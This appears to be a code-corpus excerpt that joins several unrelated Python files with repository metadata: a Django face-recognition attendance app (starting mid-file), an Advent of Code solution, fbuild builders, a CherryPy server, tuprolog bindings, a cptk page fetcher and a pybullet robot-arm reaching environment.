person_name=encoder.inverse_transform(np.ravel([pred]))[0]
pred=person_name
if count[pred] == 0:
start[pred] = time.time()
count[pred] = count.get(pred,0) + 1
if count[pred] == 4 and (time.time()-start[pred]) > 1.5:
count[pred] = 0
else:
#if count[pred] == 4 and (time.time()-start) <= 1.5:
present[pred] = True
log_time[pred] = datetime.datetime.now()
count[pred] = count.get(pred,0) + 1
print(pred, present[pred], count[pred])
cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
else:
person_name="unknown"
cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
#cv2.putText()
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
#cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Mark Attendance- Out - Press q to exit",frame)
#Before closing it we need to give a wait command, otherwise the open cv wont work
# @params with the millisecond of delay 1
#cv2.waitKey(1)
#To get out of the loop
key=cv2.waitKey(50) & 0xFF
if(key==ord("q")):
break
#Stoping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
update_attendance_in_db_out(present)
return redirect('home')
@login_required
def train(request):
if request.user.username!='admin':
return redirect('not-authorised')
training_dir='face_recognition_data/training_dataset'
count=0
for person_name in os.listdir(training_dir):
curr_directory=os.path.join(training_dir,person_name)
if not os.path.isdir(curr_directory):
continue
for imagefile in image_files_in_folder(curr_directory):
count+=1
X=[]
y=[]
i=0
for person_name in os.listdir(training_dir):
print(str(person_name))
curr_directory=os.path.join(training_dir,person_name)
if not os.path.isdir(curr_directory):
continue
for imagefile in image_files_in_folder(curr_directory):
print(str(imagefile))
image=cv2.imread(imagefile)
try:
X.append((face_recognition.face_encodings(image)[0]).tolist())
y.append(person_name)
i+=1
except:
print("removed")
os.remove(imagefile)
targets=np.array(y)
encoder = LabelEncoder()
encoder.fit(y)
y=encoder.transform(y)
X1=np.array(X)
print("shape: "+ str(X1.shape))
np.save('face_recognition_data/classes.npy', encoder.classes_)
svc = SVC(kernel='linear',probability=True)
svc.fit(X1,y)
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'wb') as f:
pickle.dump(svc,f)
vizualize_Data(X1,targets)
messages.success(request, f'Training Complete.')
return render(request,"recognition/train.html")
@login_required
def not_authorised(request):
return render(request,'recognition/not_authorised.html')
@login_required
def view_attendance_home(request):
total_num_of_emp=total_number_employees()
emp_present_today=employees_present_today()
this_week_emp_count_vs_date()
last_week_emp_count_vs_date()
return render(request,"recognition/view_attendance_home.html", {'total_num_of_emp' : total_num_of_emp, 'emp_present_today': emp_present_today})
@login_required
def view_attendance_date(request):
if request.user.username!='admin':
return redirect('not-authorised')
qs=None
time_qs=None
present_qs=None
if request.method=='POST':
form=DateForm(request.POST)
if form.is_valid():
date=form.cleaned_data.get('date')
print("date:"+ str(date))
time_qs=Time.objects.filter(date=date)
present_qs=Present.objects.filter(date=date)
if(len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_employee_given_date(present_qs,time_qs)
return render(request,'recognition/view_attendance_date.html', {'form' : form,'qs' : qs })
else:
messages.warning(request, f'No records for selected date.')
return redirect('view-attendance-date')
else:
form=DateForm()
return render(request,'recognition/view_attendance_date.html', {'form' : form, 'qs' : qs})
@login_required
def view_attendance_employee(request):
if request.user.username!='admin':
return redirect('not-authorised')
time_qs=None
present_qs=None
qs=None
if request.method=='POST':
form=UsernameAndDateForm(request.POST)
if form.is_valid():
username=form.cleaned_data.get('username')
if username_present(username):
u=User.objects.get(username=username)
time_qs=Time.objects.filter(user=u)
present_qs=Present.objects.filter(user=u)
date_from=form.cleaned_data.get('date_from')
date_to=form.cleaned_data.get('date_to')
if date_to < date_from:
messages.warning(request, f'Invalid date selection.')
return redirect('view-attendance-employee')
else:
time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
if (len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_date_given_employee(present_qs,time_qs,admin=True)
return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs})
else:
#print("inside qs is None")
messages.warning(request, f'No records for selected duration.')
return redirect('view-attendance-employee')
else:
print("invalid username")
messages.warning(request, f'No such username found.')
return redirect('view-attendance-employee')
else:
form=UsernameAndDateForm()
return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs})
@login_required
def view_my_attendance_employee_login(request):
if request.user.username=='admin':
return redirect('not-authorised')
qs=None
time_qs=None
present_qs=None
if request.method=='POST':
form=DateForm_2(request.POST)
if form.is_valid():
u=request.user
time_qs=Time.objects.filter(user=u)
present_qs=Present.objects.filter(user=u)
date_from=form.cleaned_data.get('date_from')
date_to=form.cleaned_data.get('date_to')
if date_to < date_from:
messages.warning(request, f'Invalid date selection.')
return redirect('view-my-attendance-employee-login')
else:
time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
if (len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_date_given_employee(present_qs,time_qs,admin=False)
return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs})
else:
messages.warning(request, f'No records for selected duration.')
return redirect('view-my-attendance-employee-login')
else:
form=DateForm_2()
return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs}) | 2.171875 | 2 |
2018/05.py | GillesArcas/Advent_of_Code | 0 | 7880 | import re
import string
DATA = '05.txt'
def react(polymer):
pairs = '|'.join([a + b + '|' + b + a for a, b in zip(string.ascii_lowercase, string.ascii_uppercase)])
length = len(polymer)
while 1:
polymer = re.sub(pairs, '', polymer)
if len(polymer) == length:
return(length)
else:
length = len(polymer)
def code1():
with open(DATA) as f:
polymer = f.readline().strip()
print('1>', react(polymer))
def code2():
with open(DATA) as f:
polymer = f.readline().strip()
minlength = len(polymer)
for c in string.ascii_lowercase:
polymer2 = re.sub(c, '', polymer, flags=re.I)
length = react(polymer2)
if length < minlength:
minlength = length
print('2>', minlength)
code1()
code2()
| 3.265625 | 3 |
lib/fbuild/builders/__init__.py | felix-lang/fbuild | 40 | 7881 | <reponame>felix-lang/fbuild
import abc
import contextlib
import os
import sys
from functools import partial
from itertools import chain
import fbuild
import fbuild.db
import fbuild.path
import fbuild.temp
from . import platform
# ------------------------------------------------------------------------------
class MissingProgram(fbuild.ConfigFailed):
def __init__(self, programs=None):
self.programs = programs
def __str__(self):
if self.programs is None:
return 'cannot find program'
else:
return 'cannot find any of the programs %s' % \
' '.join(repr(str(p)) for p in self.programs)
# ------------------------------------------------------------------------------
@fbuild.db.caches
def find_program(ctx, names, paths=None, *, quieter=0):
"""L{find_program} is a test that searches the paths for one of the
programs in I{name}. If one is found, it is returned. If not, the next
name in the list is searched for."""
if paths is None:
paths = os.environ['PATH'].split(os.pathsep)
# If we're running on windows, we need to append '.exe' to the filenames
# that we're searching for.
if sys.platform == 'win32':
new_names = []
for name in names:
if \
not name.endswith('.exe') or \
not name.endswith('.cmd') or \
not name.endswith('.bat'):
new_names.append(name + '.exe')
new_names.append(name + '.cmd')
new_names.append(name + '.bat')
new_names.append(name)
names = new_names
for name in names:
filename = fbuild.path.Path(name)
ctx.logger.check('looking for ' + filename.name, verbose=quieter)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(name)
else:
for path in paths:
filename = fbuild.path.Path(path, name)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(filename)
ctx.logger.failed(verbose=quieter)
raise MissingProgram(names)
# ------------------------------------------------------------------------------
def check_version(ctx, builder, version_function, *,
requires_version=None,
requires_at_least_version=None,
requires_at_most_version=None):
"""Helper function to simplify checking the version of a builder."""
if any(v is not None for v in (
requires_version,
requires_at_least_version,
requires_at_most_version)):
ctx.logger.check('checking %s version' % builder)
version_str = version_function()
# Convert the version into a tuple
version = []
for i in version_str.split('.'):
try:
version.append(int(i))
except ValueError:
# The subversion isn't a number, so just convert it to a
# string.
version.append(i)
version = tuple(version)
if requires_version is not None and requires_version != version:
msg = 'version %s required; found %s' % (
'.'.join(str(i) for i in requires_version), version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_least_version is not None and \
requires_at_least_version > version:
msg = 'at least version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_least_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_most_version is not None and \
requires_at_most_version < version:
msg = 'at most version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_most_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
ctx.logger.passed(version_str)
# ------------------------------------------------------------------------------
class AbstractCompiler(fbuild.db.PersistentObject):
def __init__(self, *args, src_suffix, **kwargs):
super().__init__(*args, **kwargs)
self.src_suffix = src_suffix
@fbuild.db.cachemethod
def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST:
return self.uncached_compile(src, *args, **kwargs)
@abc.abstractmethod
def uncached_compile(self, src, *args, **kwargs):
pass
@fbuild.db.cachemethod
@platform.auto_platform_options()
def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \
fbuild.db.DSTS:
"""Compile all of the passed in L{srcs} in parallel."""
# When a object has extra external dependencies, such as .c files
# depending on .h changes, depending on library changes, we need to add
# the dependencies in build_objects. Unfortunately, the db doesn't
# know about these new files and so it can't tell when a function
# really needs to be rerun. So, we'll just not cache this function.
# We need to add extra dependencies to our call.
objs = []
src_deps = []
dst_deps = []
for o, s, d in self.ctx.scheduler.map(
partial(self.compile.call, *args, **kwargs),
srcs):
objs.append(o)
src_deps.extend(s)
dst_deps.extend(d)
self.ctx.db.add_external_dependencies_to_call(
srcs=src_deps,
dsts=dst_deps)
return objs
# --------------------------------------------------------------------------
def tempfile(self, code):
return fbuild.temp.tempfile(code, self.src_suffix)
@contextlib.contextmanager
def tempfile_compile(self, code='', *, quieter=1, **kwargs):
with self.tempfile(code) as src:
yield self.uncached_compile(src, quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_compile(self, *args, **kwargs):
try:
with self.tempfile_compile(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_compile(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_compile(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractLibLinker(AbstractCompiler):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_lib(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into a library and caches the results."""
return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_lib(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into a library."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_lib(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs)
def try_link_lib(self, *args, **kwargs):
try:
with self.tempfile_link_lib(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
def check_link_lib(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_lib(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractRunner(fbuild.db.PersistentObject):
@abc.abstractmethod
def tempfile_run(self, *args, **kwargs):
pass
def try_run(self, code='', quieter=1, **kwargs):
try:
self.tempfile_run(code, quieter=quieter, **kwargs)
except fbuild.ExecutionError:
return False
else:
return True
def check_run(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_run(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractExeLinker(AbstractCompiler, AbstractRunner):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_exe(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into an executable."""
return self.uncached_link_exe(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_exe(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into an executable."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_exe(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_link_exe(self, *args, **kwargs):
try:
with self.tempfile_link_exe(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_link_exe(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_exe(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
@platform.auto_platform_options()
def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs):
with self.tempfile_link_exe(*args,
quieter=quieter,
ckwargs=ckwargs,
**lkwargs) as exe:
return self.ctx.execute([exe],
quieter=quieter,
cwd=exe.parent,
**kwargs)
# ------------------------------------------------------------------------------
class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker):
pass
| 2.46875 | 2 |
WebServer.py | i3uex/CompareML | 0 | 7882 | import json
import cherrypy
import engine
class WebServer(object):
@cherrypy.expose
def index(self):
return open('public/index.html', encoding='utf-8')
@cherrypy.expose
class GetOptionsService(object):
@cherrypy.tools.accept(media='text/plain')
def GET(self):
return json.dumps({
'providers': engine.get_providers(),
'algorithms': engine.get_algorithms(),
'default_datasets': engine.get_all_default_datasets()
})
@cherrypy.expose
class SetOptionsService(object):
@cherrypy.tools.accept(media='text/plain')
def POST(self, options):
""" Use the options selected by the user to execute all algorithms
:param options: {
is_default_dataset: bool,
dataset: str,
providers: []
algorithms: []
target: str
}
if is_default_dataset is true, dataset will contain the name of the default_dataset"""
options_dic = json.loads(options)
try:
result = engine.execute(options_dic['is_default_dataset'], options_dic['dataset'], options_dic['providers'],
options_dic['algorithms'],
options_dic['target'])
except Exception as exception:
message = f"{str(exception)}"
raise cherrypy.HTTPError(500, message=message)
return result
@cherrypy.expose
@cherrypy.tools.json_out()
class GetDefaultDatasetHeadersService(object):
@cherrypy.tools.accept(media='text/plain')
def GET(self, default_dataset_name):
return {'headers': engine.get_default_dataset_headers(default_dataset_name)}
| 2.609375 | 3 |
tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 1 | 7883 | from typing import Union
from tuprolog import logger
# noinspection PyUnresolvedReferences
import jpype.imports
# noinspection PyUnresolvedReferences
import it.unibo.tuprolog.solve.exception.error as errors
from tuprolog.core import Term, Atom
from tuprolog.solve import ExecutionContext, Signature
ExistenceError = errors.ExistenceError
ObjectType = ExistenceError.ObjectType
OBJECT_PROCEDURE = ObjectType.PROCEDURE
OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK
OBJECT_RESOURCE = ObjectType.RESOURCE
OBJECT_STREAM = ObjectType.STREAM
OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS
OBJECT_OOP_METHOD = ObjectType.OOP_METHOD
OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR
OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY
def existence_error(
context: ExecutionContext,
type: ObjectType,
culprit: Term,
message: str
) -> ExistenceError:
return ExistenceError.of(context, type, culprit, message)
def existence_error_for_source_sink(
context: ExecutionContext,
alias: Union[Atom, str]
) -> ExistenceError:
return ExistenceError.forSourceSink(context, alias)
def existence_error_for_procedure(
context: ExecutionContext,
procedure: Signature
) -> ExistenceError:
return ExistenceError.forProcedure(context, procedure)
def existence_error_for_stream(
context: ExecutionContext,
stream: Term
) -> ExistenceError:
return ExistenceError.forStream(context, stream)
def existence_error_for_resource(
context: ExecutionContext,
name: str
) -> ExistenceError:
return ExistenceError.forResource(context, name)
def object_type(name: Union[str, Term]) -> ObjectType:
if isinstance(name, str):
return ObjectType.of(name)
else:
return ObjectType.fromTerm(name)
logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
| 2.046875 | 2 |
cptk/core/fetcher.py | RealA10N/cptk | 5 | 7884 | <filename>cptk/core/fetcher.py
from __future__ import annotations
from typing import TYPE_CHECKING
import pkg_resources
from bs4 import BeautifulSoup
from requests import session
from cptk.scrape import PageInfo
from cptk.scrape import Website
from cptk.utils import cptkException
if TYPE_CHECKING:
from cptk.scrape import Problem
class InvalidClone(cptkException):
""" Raised when the clone command is called with a 'PageInfo' instance that
doesn't describe anything that can be cloned. """
def __init__(self, info: PageInfo) -> None:
self.info = info
super().__init__(f"We don't know how to handle data from {info.url!r}")
class UnknownWebsite(cptkException):
""" Raised when trying to fetch information from a website that is not
registed and can't be handled by cptk. """
def __init__(self, domain: str) -> None:
self.domain = domain
super().__init__(f"We don't know how to handle data from {domain!r}")
class Fetcher:
def __init__(self) -> None:
self.session = session()
self._load_websites()
def _load_websites(self) -> list[type[Website]]:
self._websites = [
point.load()()
for point in pkg_resources.iter_entry_points('cptk_sites')
]
self._domain_to_website = dict()
for website in self._websites:
domain = website.domain
if isinstance(domain, str):
self._domain_to_website[domain] = website
else:
for cur in domain:
self._domain_to_website[cur] = website
def page_to_problem(self, info: PageInfo) -> Problem:
""" Recives an arbitrary page info instance and tries to match it with
a Website class that knows how to handle this specific website. If cptk
doesn't find a way to parse the given webpage, it raises the
'InvalidClone' exception. """
for website in self._websites:
if website.is_problem(info):
return website.to_problem(info)
raise InvalidClone(info)
def to_page(self, url: str) -> PageInfo:
""" Makes an get http/s request to the given URL and returns the result
as a PageInfo instance. """
if not url.startswith('http'):
url = f'http://{url}'
res = self.session.get(url)
data = BeautifulSoup(res.content, 'lxml')
return PageInfo(url, data)
| 2.75 | 3 |
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py | Hinson-A/guyueclass | 227 | 7885 | import pybullet as p
import pybullet_data
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
from math import sqrt
import random
import time
import math
import cv2
import torch
import os
def random_crop(imgs, out):
"""
args:
imgs: shape (B,C,H,W)
out: output size (e.g. 84)
"""
n, c, h, w = imgs.shape
crop_max = h - out + 1
w1 = np.random.randint(0, crop_max, n)
h1 = np.random.randint(0, crop_max, n)
cropped = np.empty((n, c, out, out), dtype=imgs.dtype)
for i, (img, w11, h11) in enumerate(zip(imgs, w1, h1)):
cropped[i] = img[:, h11:h11 + out, w11:w11 + out]
return cropped
class KukaReachVisualEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': 50
}
kMaxEpisodeSteps = 700
kImageSize = {'width': 96, 'height': 96}
kFinalImageSize = {'width': 84, 'height': 84}
def __init__(self, is_render=False, is_good_view=False):
self.is_render = is_render
self.is_good_view = is_good_view
if self.is_render:
p.connect(p.GUI)
else:
p.connect(p.DIRECT)
self.x_low_obs = 0.2
self.x_high_obs = 0.7
self.y_low_obs = -0.3
self.y_high_obs = 0.3
self.z_low_obs = 0
self.z_high_obs = 0.55
self.x_low_action = -0.4
self.x_high_action = 0.4
self.y_low_action = -0.4
self.y_high_action = 0.4
self.z_low_action = -0.6
self.z_high_action = 0.3
self.step_counter = 0
self.urdf_root_path = pybullet_data.getDataPath()
# lower limits for null space
self.lower_limits = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]
# upper limits for null space
self.upper_limits = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]
# joint ranges for null space
self.joint_ranges = [5.8, 4, 5.8, 4, 5.8, 4, 6]
# restposes for null space
self.rest_poses = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]
# joint damping coefficents
self.joint_damping = [
0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001
]
self.init_joint_positions = [
0.006418, 0.413184, -0.011401, -1.589317, 0.005379, 1.137684,
-0.006539
]
self.orientation = p.getQuaternionFromEuler(
[0., -math.pi, math.pi / 2.])
self.camera_parameters = {
'width': 960.,
'height': 720,
'fov': 60,
'near': 0.1,
'far': 100.,
'eye_position': [0.59, 0, 0.8],
'target_position': [0.55, 0, 0.05],
'camera_up_vector':
[1, 0, 0], # I really do not know the parameter's effect.
'light_direction': [
0.5, 0, 1
], # the direction is from the light source position to the origin of the world frame.
}
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(
cameraTargetPosition=[0.55, 0, 0.05],
distance=.7,
yaw=90,
pitch=-70,
roll=0,
upAxisIndex=2)
self.projection_matrix = p.computeProjectionMatrixFOV(
fov=self.camera_parameters['fov'],
aspect=self.camera_parameters['width'] /
self.camera_parameters['height'],
nearVal=self.camera_parameters['near'],
farVal=self.camera_parameters['far'])
p.configureDebugVisualizer(lightPosition=[5, 0, 5])
p.resetDebugVisualizerCamera(cameraDistance=1.5,
cameraYaw=0,
cameraPitch=-40,
cameraTargetPosition=[0.55, -0.35, 0.2])
self.action_space = spaces.Box(low=np.array(
[self.x_low_action, self.y_low_action, self.z_low_action]),
high=np.array([
self.x_high_action,
self.y_high_action,
self.z_high_action
]),
dtype=np.float32)
self.observation_space = spaces.Box(low=0, high=1,
shape=(1, self.kFinalImageSize['width'], self.kFinalImageSize['height']))
self.seed()
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self):
self.step_counter = 0
p.resetSimulation()
# p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0)
self.terminated = False
p.setGravity(0, 0, -10)
# 这些是周围那些白线,用来观察是否超过了obs的边界
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, 0],
lineToXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_high_obs, 0],
lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_low_obs, 0],
lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_high_obs, 0],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.loadURDF(os.path.join(self.urdf_root_path, "plane.urdf"),
basePosition=[0, 0, -0.65])
self.kuka_id = p.loadURDF(os.path.join(self.urdf_root_path,
"kuka_iiwa/model.urdf"),
useFixedBase=True)
table_uid = p.loadURDF(os.path.join(self.urdf_root_path,
"table/table.urdf"),
basePosition=[0.5, 0, -0.65])
p.changeVisualShape(table_uid, -1, rgbaColor=[1, 1, 1, 1])
self.object_id = p.loadURDF(os.path.join(self.urdf_root_path,
"random_urdfs/000/000.urdf"),
basePosition=[
random.uniform(self.x_low_obs,
self.x_high_obs),
random.uniform(self.y_low_obs,
self.y_high_obs), 0.01
])
self.num_joints = p.getNumJoints(self.kuka_id)
for i in range(self.num_joints):
p.resetJointState(
bodyUniqueId=self.kuka_id,
jointIndex=i,
targetValue=self.init_joint_positions[i],
)
self.robot_pos_obs = p.getLinkState(self.kuka_id,
self.num_joints - 1)[4]
p.stepSimulation()
(_, _, px, _,
_) = p.getCameraImage(width=960,
height=960,
viewMatrix=self.view_matrix,
projectionMatrix=self.projection_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
self.images = px
p.enableJointForceTorqueSensor(bodyUniqueId=self.kuka_id,
jointIndex=self.num_joints - 1,
enableSensor=True)
self.object_pos = p.getBasePositionAndOrientation(self.object_id)[0]
self.images = self.images[:, :, :
3] # the 4th channel is alpha channel, we do not need it.
return self._process_image(self.images)
def _process_image(self, image):
"""Convert the RGB pic to gray pic and add a channel 1
Args:
image ([type]): [description]
"""
if image is not None:
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
image = cv2.resize(image, (self.kImageSize['width'], self.kImageSize['height']))[None, :, :] / 255.
return image
else:
return np.zeros((1, self.kImageSize['width'], self.kImageSize['height']))
def step(self, action):
dv = 0.005
dx = action[0] * dv
dy = action[1] * dv
dz = action[2] * dv
self.current_pos = p.getLinkState(self.kuka_id, self.num_joints - 1)[4]
self.new_robot_pos = [
self.current_pos[0] + dx, self.current_pos[1] + dy,
self.current_pos[2] + dz
]
self.robot_joint_positions = p.calculateInverseKinematics(
bodyUniqueId=self.kuka_id,
endEffectorLinkIndex=self.num_joints - 1,
targetPosition=[
self.new_robot_pos[0], self.new_robot_pos[1],
self.new_robot_pos[2]
],
targetOrientation=self.orientation,
jointDamping=self.joint_damping,
)
for i in range(self.num_joints):
p.resetJointState(
bodyUniqueId=self.kuka_id,
jointIndex=i,
targetValue=self.robot_joint_positions[i],
)
p.stepSimulation()
# 在代码开始部分,如果定义了is_good_view,那么机械臂的动作会变慢,方便观察
if self.is_good_view:
time.sleep(0.05)
self.step_counter += 1
return self._reward()
def _reward(self):
# 一定注意是取第4个值,请参考pybullet手册的这个函数返回值的说明
self.robot_state = p.getLinkState(self.kuka_id, self.num_joints - 1)[4]
self.object_state = np.array(
p.getBasePositionAndOrientation(self.object_id)[0]).astype(
np.float32)
square_dx = (self.robot_state[0] - self.object_state[0]) ** 2
square_dy = (self.robot_state[1] - self.object_state[1]) ** 2
square_dz = (self.robot_state[2] - self.object_state[2]) ** 2
# 用机械臂末端和物体的距离作为奖励函数的依据
self.distance = sqrt(square_dx + square_dy + square_dz)
# print(self.distance)
x = self.robot_state[0]
y = self.robot_state[1]
z = self.robot_state[2]
# 如果机械比末端超过了obs的空间,也视为done,而且会给予一定的惩罚
terminated = bool(x < self.x_low_obs or x > self.x_high_obs
or y < self.y_low_obs or y > self.y_high_obs
or z < self.z_low_obs or z > self.z_high_obs)
if terminated:
reward = -0.1
self.terminated = True
# 如果机械臂一直无所事事,在最大步数还不能接触到物体,也需要给一定的惩罚
elif self.step_counter > self.kMaxEpisodeSteps:
reward = -0.1
self.terminated = True
elif self.distance < 0.1:
reward = 1
self.terminated = True
else:
reward = 0
self.terminated = False
info = {'distance:', self.distance}
(_, _, px, _,
_) = p.getCameraImage(width=960,
height=960,
viewMatrix=self.view_matrix,
projectionMatrix=self.projection_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
self.images = px
self.processed_image = self._process_image(self.images)
# self.observation=self.robot_state
self.observation = self.object_state
return self.processed_image, reward, self.terminated, info
def close(self):
p.disconnect()
def _get_force_sensor_value(self):
force_sensor_value = p.getJointState(bodyUniqueId=self.kuka_id,
jointIndex=self.num_joints -
1)[2][2]
# the first 2 stands for jointReactionForces, the second 2 stands for Fz,
# the pybullet methods' return is a tuple,so can not
# index it with str like dict. I think it can be improved
# that return value is a dict rather than tuple.
return force_sensor_value
class CustomSkipFrame(gym.Wrapper):
""" Make a 4 frame skip, so the observation space will change to (4,84,84) from (1,84,84)
Args:
gym ([type]): [description]
"""
def __init__(self, env, skip=4):
super(CustomSkipFrame, self).__init__(env)
self.observation_space = spaces.Box(low=0,
high=1,
shape=(skip, self.kFinalImageSize['width'], self.kFinalImageSize['height']))
self.skip = skip
def step(self, action):
total_reward = 0
states = []
state, reward, done, info = self.env.step(action)
for i in range(self.skip):
if not done:
state, reward, done, info = self.env.step(action)
total_reward += reward
states.append(state)
else:
states.append(state)
states = np.concatenate(states, 0)[None, :, :, :]
return random_crop(states.astype(np.float32), self.kFinalImageSize['width']), reward, done, info
def reset(self):
state = self.env.reset()
states = np.concatenate([state for _ in range(self.skip)],
0)[None, :, :, :]
return random_crop(states.astype(np.float32), self.kFinalImageSize['width'])
if __name__ == '__main__':
# 这一部分是做baseline,即让机械臂随机选择动作,看看能够得到的分数
import matplotlib.pyplot as plt
env = KukaReachVisualEnv(is_render=False)
env = CustomSkipFrame(env)
print(env.observation_space.shape)
